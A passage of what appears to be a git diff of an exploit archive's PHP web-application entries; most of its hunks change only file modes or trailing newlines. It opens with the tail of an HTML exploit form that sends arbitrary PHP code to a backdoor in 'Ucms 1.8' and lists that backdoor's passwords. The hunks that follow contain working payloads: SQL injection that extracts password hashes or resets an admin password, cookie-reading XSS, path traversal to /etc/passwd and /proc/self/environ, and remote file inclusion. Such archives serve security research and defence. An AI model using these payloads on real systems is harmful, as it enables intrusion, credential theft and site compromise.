1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> </textarea> <br /> <input type="submit" value="exploit"> </form> </body> <!-- It�s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html> \ No newline at end of file diff --git a/platforms/php/webapps/30799.txt b/platforms/php/webapps/30799.txt old mode 100755 new mode 100644 index 77a965339..237c00f51 --- a/platforms/php/webapps/30799.txt +++ b/platforms/php/webapps/30799.txt @@ -4,4 +4,4 @@ MySpace Scripts Poll Creator is prone to an HTML-injection vulnerability because Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. -http://www.example.com/poll/index.php?action=create_new \ No newline at end of file +http://www.example.com/poll/index.php?action=create_new \ No newline at end of file diff --git a/platforms/php/webapps/30801.txt b/platforms/php/webapps/30801.txt old mode 100755 new mode 100644 index 16325c76c..cc9659ed4 --- a/platforms/php/webapps/30801.txt +++ b/platforms/php/webapps/30801.txt @@ -9,4 +9,4 @@ Bandersnatch 0.4 is vulnerable; other versions may also be affected. http://www.example.com/path/to/index.php?func=[injectionpoint] http://www.example.com/path/to/index.php?date=[injectionpoint] http://www.example.com/path/to/index.php?func=log&jid=[injectionpoint] -http://www.example.com/path/to/index.php?func=user&jid=[injectionpoint] \ No newline at end of file +http://www.example.com/path/to/index.php?func=user&jid=[injectionpoint] \ No newline at end of file diff --git a/platforms/php/webapps/30803.txt b/platforms/php/webapps/30803.txt old mode 100755 new mode 100644 index 4e04b374d..14852e7e1 --- a/platforms/php/webapps/30803.txt +++ b/platforms/php/webapps/30803.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects E-Lite POS 1.0; other versions may also be vulnerable. -1' UPDATE users set user_name= 'admin' Where(user_iD= '1');-- --1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');-- \ No newline at end of file +-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');-- \ No newline at end of file diff --git a/platforms/php/webapps/30804.txt b/platforms/php/webapps/30804.txt old mode 100755 new mode 100644 index 4aa306c62..3637155d0 --- a/platforms/php/webapps/30804.txt +++ b/platforms/php/webapps/30804.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary HTML or script code This issue affects VBTube 1.1; other versions may also be vulnerable. -http://www.example.com/vBTube.php?do=search&search=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/vBTube.php?do=search&search=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30806.txt b/platforms/php/webapps/30806.txt old mode 100755 new mode 100644 index 74d2d20b3..7bad2dfd4 --- a/platforms/php/webapps/30806.txt +++ b/platforms/php/webapps/30806.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary HTML or script code This issue affects PHPSlideShow 0.9.9.2; other versions may also be vulnerable. -http://www.example.com/scripts/demo/phpslideshow.php?directory="><iframe> http://www.example.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html> http://www.example.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" http://www.example.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E \ No newline at end of file +http://www.example.com/scripts/demo/phpslideshow.php?directory="><iframe> http://www.example.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html> http://www.example.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" http://www.example.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E \ No newline at end of file diff --git a/platforms/php/webapps/30810.txt b/platforms/php/webapps/30810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30811.txt b/platforms/php/webapps/30811.txt old mode 100755 new mode 100644 index 26cb35a72..6045f694c --- a/platforms/php/webapps/30811.txt +++ b/platforms/php/webapps/30811.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary HTML or script code This issue affects SimpleGallery 0.1.3; other versions may also be vulnerable. -http://www.example.com/PATH/index.php?album=[XSS] \ No newline at end of file +http://www.example.com/PATH/index.php?album=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30813.txt b/platforms/php/webapps/30813.txt old mode 100755 new mode 100644 index 82876f037..72c42b8c5 --- a/platforms/php/webapps/30813.txt +++ b/platforms/php/webapps/30813.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to execute arbitrary HTML or script cod This issue affects FMDeluxe 2.1.0; other versions may also be affected. -http://www.example.com/PATH/index.php?action=category&id=[XSS] \ No newline at end of file +http://www.example.com/PATH/index.php?action=category&id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30815.txt b/platforms/php/webapps/30815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30817.html b/platforms/php/webapps/30817.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3082.txt b/platforms/php/webapps/3082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30820.txt b/platforms/php/webapps/30820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30821.txt b/platforms/php/webapps/30821.txt old mode 100755 new mode 100644 index d5c7639b7..53ce240e2 --- a/platforms/php/webapps/30821.txt +++ b/platforms/php/webapps/30821.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable. -http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com \ No newline at end of file +http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/30822.txt b/platforms/php/webapps/30822.txt old mode 100755 new mode 100644 index 3926d0432..fb76e3fe2 --- a/platforms/php/webapps/30822.txt +++ b/platforms/php/webapps/30822.txt @@ -11,4 +11,4 @@ BEA AquaLogic Interaction 6.1 through service pack 1 on all platforms https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_ apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_ req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and -https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps= 1&control=advancedstart&in_ hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and \ No newline at end of file +https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps= 1&control=advancedstart&in_ hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and \ No newline at end of file diff --git a/platforms/php/webapps/30823.txt b/platforms/php/webapps/30823.txt old mode 100755 new mode 100644 index d16e30687..1f104d6ca --- a/platforms/php/webapps/30823.txt +++ b/platforms/php/webapps/30823.txt @@ -8,4 +8,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica These issues affect bcoos 1.0.10; other versions may also be affected. -http://www.example.com/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30824.txt b/platforms/php/webapps/30824.txt old mode 100755 new mode 100644 index 259fd6a80..d15365944 --- a/platforms/php/webapps/30824.txt +++ b/platforms/php/webapps/30824.txt @@ -8,4 +8,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica These issues affect bcoos 1.0.10; other versions may also be affected. -http://www.example.com/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30826.txt b/platforms/php/webapps/30826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30827.txt b/platforms/php/webapps/30827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30828.txt b/platforms/php/webapps/30828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30829.txt b/platforms/php/webapps/30829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3083.txt b/platforms/php/webapps/3083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30830.txt b/platforms/php/webapps/30830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30831.txt b/platforms/php/webapps/30831.txt old mode 100755 new mode 100644 index 8f139c22e..1da18afb0 --- a/platforms/php/webapps/30831.txt +++ b/platforms/php/webapps/30831.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable. -http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com \ No newline at end of file +http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/30836.txt b/platforms/php/webapps/30836.txt old mode 100755 new mode 100644 index 1e1a91673..fb379a364 --- a/platforms/php/webapps/30836.txt +++ b/platforms/php/webapps/30836.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access This issue affects bcoos 1.0.10; other versions may also be affected. -http://www.example.com/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30846.txt b/platforms/php/webapps/30846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30847.txt b/platforms/php/webapps/30847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30848.txt b/platforms/php/webapps/30848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30849.txt b/platforms/php/webapps/30849.txt old mode 100755 new mode 100644 index 54833ef63..13365915c --- a/platforms/php/webapps/30849.txt +++ b/platforms/php/webapps/30849.txt @@ -9,4 +9,4 @@ Joomla! 1.5 RC3 is vulnerable; other versions may also be affected. UPDATE (December 10, 2007): The validity of the issues is being disputed on the Joomla! Bug Tracker. Please see the references for details. Reports indicate that the related message was posted by a Joomla! developer, but this has not been confirmed. http://www.example.com/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search -http://www.example.com/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search \ No newline at end of file +http://www.example.com/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search \ No newline at end of file diff --git a/platforms/php/webapps/3085.php b/platforms/php/webapps/3085.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30851.txt b/platforms/php/webapps/30851.txt old mode 100755 new mode 100644 index ccf7e32c2..fcd849e3a --- a/platforms/php/webapps/30851.txt +++ b/platforms/php/webapps/30851.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to retrieve potentially sensitive information This issue affects ezContents 1.4.5; other versions may also be vulnerable. -http://www.example.com/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd \ No newline at end of file +http://www.example.com/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd \ No newline at end of file diff --git a/platforms/php/webapps/30852.txt b/platforms/php/webapps/30852.txt old mode 100755 new mode 100644 index 1b087c309..8302e27b2 --- a/platforms/php/webapps/30852.txt +++ b/platforms/php/webapps/30852.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SupportSuite 3.00.32 is affected by this issue; other versions may also be vulnerable. -http://www.example.com/SupportSuite/upload/includes/LoginShare/modernbill.login.php/%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file +http://www.example.com/SupportSuite/upload/includes/LoginShare/modernbill.login.php/%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30853.txt b/platforms/php/webapps/30853.txt old mode 100755 new mode 100644 index bf15e6132..c5b464bb6 --- a/platforms/php/webapps/30853.txt +++ b/platforms/php/webapps/30853.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OpenNewsletter 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E http://www.example.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E \ No newline at end of file +http://www.example.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E http://www.example.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30857.txt b/platforms/php/webapps/30857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30858.txt b/platforms/php/webapps/30858.txt old mode 100755 new mode 100644 index 318be0484..1dee167e4 --- a/platforms/php/webapps/30858.txt +++ b/platforms/php/webapps/30858.txt @@ -10,4 +10,4 @@ http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[yo http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code] -http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code] \ No newline at end of file +http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code] \ No newline at end of file diff --git a/platforms/php/webapps/30859.txt b/platforms/php/webapps/30859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30861.txt b/platforms/php/webapps/30861.txt old mode 100755 new mode 100644 index c3392abf1..59e14ab44 --- a/platforms/php/webapps/30861.txt +++ b/platforms/php/webapps/30861.txt @@ -4,4 +4,4 @@ E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to s Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30862.txt b/platforms/php/webapps/30862.txt old mode 100755 new mode 100644 index 70895c1ab..64cfb665c --- a/platforms/php/webapps/30862.txt +++ b/platforms/php/webapps/30862.txt @@ -4,4 +4,4 @@ E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to s Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30863.txt b/platforms/php/webapps/30863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30864.txt b/platforms/php/webapps/30864.txt old mode 100755 new mode 100644 index e65adeba8..43ac2f307 --- a/platforms/php/webapps/30864.txt +++ b/platforms/php/webapps/30864.txt @@ -4,4 +4,4 @@ E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to s Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30865.txt b/platforms/php/webapps/30865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30872.txt b/platforms/php/webapps/30872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30873.txt b/platforms/php/webapps/30873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30874.txt b/platforms/php/webapps/30874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30875.txt b/platforms/php/webapps/30875.txt old mode 100755 new mode 100644 index 05dfe545e..799866751 --- a/platforms/php/webapps/30875.txt +++ b/platforms/php/webapps/30875.txt @@ -5,4 +5,4 @@ E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to s Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 -http://www.example.com/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file +http://www.example.com/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 \ No newline at end of file diff --git a/platforms/php/webapps/30876.txt b/platforms/php/webapps/30876.txt old mode 100755 new mode 100644 index 589a068a5..838cc959f --- a/platforms/php/webapps/30876.txt +++ b/platforms/php/webapps/30876.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow attacker-supplied HTML or script code to run i Falcon Series One 1.4.3 stable is vulnerable; other versions may also be affected. -http://www.example.com/sitemap.xml.php?dir[classes]=[Evil_Code] \ No newline at end of file +http://www.example.com/sitemap.xml.php?dir[classes]=[Evil_Code] \ No newline at end of file diff --git a/platforms/php/webapps/30877.txt b/platforms/php/webapps/30877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30878.txt b/platforms/php/webapps/30878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30879.txt b/platforms/php/webapps/30879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30880.txt b/platforms/php/webapps/30880.txt old mode 100755 new mode 100644 index 01dae72a2..3ee938e6a --- a/platforms/php/webapps/30880.txt +++ b/platforms/php/webapps/30880.txt @@ -6,4 +6,4 @@ A successful exploit of these vulnerabilities could allow an attacker to comprom Bitweaver 2.0.0 and prior versions are vulnerable to these issues. -http://www.example.com/search/index.php?tk=316dccdfb62a3cad613e&highlight=[SQL_INJECTION]=&search=go \ No newline at end of file +http://www.example.com/search/index.php?tk=316dccdfb62a3cad613e&highlight=[SQL_INJECTION]=&search=go \ No newline at end of file diff --git a/platforms/php/webapps/30881.txt b/platforms/php/webapps/30881.txt old mode 100755 new mode 100644 index eabd91c77..4f9cd7e0a --- a/platforms/php/webapps/30881.txt +++ b/platforms/php/webapps/30881.txt @@ -4,4 +4,4 @@ Dance Music is prone to a local file-include vulnerability because it fails to p Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process. -http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30884.txt b/platforms/php/webapps/30884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30886.txt b/platforms/php/webapps/30886.txt old mode 100755 new mode 100644 index 9ef39c4dc..9be2ed442 --- a/platforms/php/webapps/30886.txt +++ b/platforms/php/webapps/30886.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects MKPortal M1.1 RC1; other versions may also be vulnerable. -http://www.example.com/index.php?ind=gallery&op=foto_show&ida=(sql) \ No newline at end of file +http://www.example.com/index.php?ind=gallery&op=foto_show&ida=(sql) \ No newline at end of file diff --git a/platforms/php/webapps/30887.txt b/platforms/php/webapps/30887.txt old mode 100755 new mode 100644 index c5cb75d4f..c414bf352 --- a/platforms/php/webapps/30887.txt +++ b/platforms/php/webapps/30887.txt @@ -8,4 +8,4 @@ http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.ht The following example was provided in cases where the PHP 'magic_quotes_gpc' directive is enabled: -http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess \ No newline at end of file +http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess \ No newline at end of file diff --git a/platforms/php/webapps/30888.txt b/platforms/php/webapps/30888.txt old mode 100755 new mode 100644 index 1b7520576..3a09e9057 --- a/platforms/php/webapps/30888.txt +++ b/platforms/php/webapps/30888.txt @@ -9,4 +9,4 @@ Exploiting these issues may allow an unauthorized user to steal sessions, access This issue affects phpRPG 0.8.0; other versions may also be affected. -http://www.example.com/phpRPG-0.8.0/tmp/ \ No newline at end of file +http://www.example.com/phpRPG-0.8.0/tmp/ \ No newline at end of file diff --git a/platforms/php/webapps/30889.txt b/platforms/php/webapps/30889.txt old mode 100755 new mode 100644 index 08ba36696..85762c7eb --- a/platforms/php/webapps/30889.txt +++ b/platforms/php/webapps/30889.txt @@ -6,4 +6,4 @@ This issue affects WordPress 2.3.1; other versions may also be affected. NOTE: This BID is being reinstated because further investigation reveals that the application is vulnerable. The exploit URI supplied in the initial report was not sufficient to trigger the issue, which led to the vulnerability claim being refuted. However, follow-up information from the reporter included a URI that does trigger the issue. -http://www.example.com/wordpress/index.php/wp-admin/ \ No newline at end of file +http://www.example.com/wordpress/index.php/wp-admin/ \ No newline at end of file diff --git a/platforms/php/webapps/30890.txt b/platforms/php/webapps/30890.txt old mode 100755 new mode 100644 index e4415a19f..8d146acee --- a/platforms/php/webapps/30890.txt +++ b/platforms/php/webapps/30890.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to compromise the application and These issues affect Form Tools 1.5.0b; other versions may also be vulnerable. http://www.example.com/global/templates/admin_page_open.php?g_root_dir=http://www.example2.com -http://www.example.com/global/templates/client_page_open.php?g_root_dir=http://www.example2.com \ No newline at end of file +http://www.example.com/global/templates/client_page_open.php?g_root_dir=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/30891.txt b/platforms/php/webapps/30891.txt old mode 100755 new mode 100644 index 34aa0dc8b..ff4b0b7e2 --- a/platforms/php/webapps/30891.txt +++ b/platforms/php/webapps/30891.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect Flyspray 0.9.9 - 0.9.9.3. http://www.example.com/index.php?do=index&dummy=dummy');alert('XSS');void(' -http://www.example.com/index.php?do=details&task_id=1174&details=');alert('XSS \ No newline at end of file +http://www.example.com/index.php?do=details&task_id=1174&details=');alert('XSS \ No newline at end of file diff --git a/platforms/php/webapps/30892.txt b/platforms/php/webapps/30892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30893.txt b/platforms/php/webapps/30893.txt old mode 100755 new mode 100644 index 1dbe00bb4..9ae4ce18b --- a/platforms/php/webapps/30893.txt +++ b/platforms/php/webapps/30893.txt @@ -16,4 +16,4 @@ Content-Type: application/x-www-form-urlencoded\r\n Content-Length: <SIZE>\r\n\r\n username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=authentification&button=Log+in\r\n\r\n -SQL-query: select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administrator-----------' \ No newline at end of file +SQL-query: select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administrator-----------' \ No newline at end of file diff --git a/platforms/php/webapps/30899.txt b/platforms/php/webapps/30899.txt old mode 100755 new mode 100644 index 21a9ac115..5886251fd --- a/platforms/php/webapps/30899.txt +++ b/platforms/php/webapps/30899.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Mambo 4.6.2 is vulnerable; other versions may also be affected. -http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"><script>alert("XSS%20Successful")</script> http://localhost/index.php?option=>"><script>alert("XSS%20Successful")</script>&Itemid=1 \ No newline at end of file +http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"><script>alert("XSS%20Successful")</script> http://localhost/index.php?option=>"><script>alert("XSS%20Successful")</script>&Itemid=1 \ No newline at end of file diff --git a/platforms/php/webapps/309.c b/platforms/php/webapps/309.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3090.txt b/platforms/php/webapps/3090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30909.html b/platforms/php/webapps/30909.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3091.php b/platforms/php/webapps/3091.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30910.txt b/platforms/php/webapps/30910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30911.txt b/platforms/php/webapps/30911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30912.txt b/platforms/php/webapps/30912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30913.txt b/platforms/php/webapps/30913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30916.txt b/platforms/php/webapps/30916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30917.txt b/platforms/php/webapps/30917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30918.txt b/platforms/php/webapps/30918.txt old mode 100755 new mode 100644 index 077afc58b..8efe15dfd --- a/platforms/php/webapps/30918.txt +++ b/platforms/php/webapps/30918.txt @@ -9,4 +9,4 @@ This issue affects iSupport 1.8; other versions may also be affected. http://www.example.com/iSupport/index.php?include_file=[local file] http://www.example.com/helpdesk/index.php?include_file=../../../../../proc/self/environ -http://www.example.com/helpdesk/index.php?include_file=../../../../../etc/passwd \ No newline at end of file +http://www.example.com/helpdesk/index.php?include_file=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30921.txt b/platforms/php/webapps/30921.txt old mode 100755 new mode 100644 index 5d5bfc8ea..3721d49a2 --- a/platforms/php/webapps/30921.txt +++ b/platforms/php/webapps/30921.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle. -http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007 \ No newline at end of file +http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007 \ No newline at end of file diff --git a/platforms/php/webapps/30923.txt b/platforms/php/webapps/30923.txt old mode 100755 new mode 100644 index e7af804c4..a3d3bff2d --- a/platforms/php/webapps/30923.txt +++ b/platforms/php/webapps/30923.txt @@ -4,4 +4,4 @@ MyBlog is prone to a remote file-include vulnerability because it fails to suffi Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[path]/games.php?id=[Sh3ll-Script] \ No newline at end of file +http://www.example.com/[path]/games.php?id=[Sh3ll-Script] \ No newline at end of file diff --git a/platforms/php/webapps/30924.txt b/platforms/php/webapps/30924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30925.txt b/platforms/php/webapps/30925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30926.txt b/platforms/php/webapps/30926.txt old mode 100755 new mode 100644 index db505167c..40e245005 --- a/platforms/php/webapps/30926.txt +++ b/platforms/php/webapps/30926.txt @@ -6,5 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect Dokeos 1.8.4 and earlier versions. 